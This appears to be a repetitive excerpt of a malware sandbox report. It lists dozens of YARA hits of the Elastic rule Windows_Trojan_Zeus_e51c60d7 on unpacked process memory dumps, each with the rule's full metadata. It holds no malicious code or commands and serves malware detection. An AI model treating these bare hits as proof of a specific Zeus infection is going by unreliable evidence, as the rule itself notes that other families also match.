Source: 2.3.svchost.exe.b00000.67.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.85.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.82.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.67.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2ab0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.76.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 39.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.ee0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.4900000.48.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.83.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 8.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1510000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.uavINoSIQh.exe.59cb00.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.42.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.uavINoSIQh.exe.597700.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.61.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 17.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.22c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.82.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 19.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2550000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.66.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.62.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.61.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.52.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.77.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.65.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.64.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.34.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.77.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 17.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.22c0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.59.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2452000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.63.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.uavINoSIQh.exe.406400.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.889400.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.53.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.80.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1320000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 13.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2d60000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.13e0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.75.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1342000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.65.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.uavINoSIQh.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.33.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
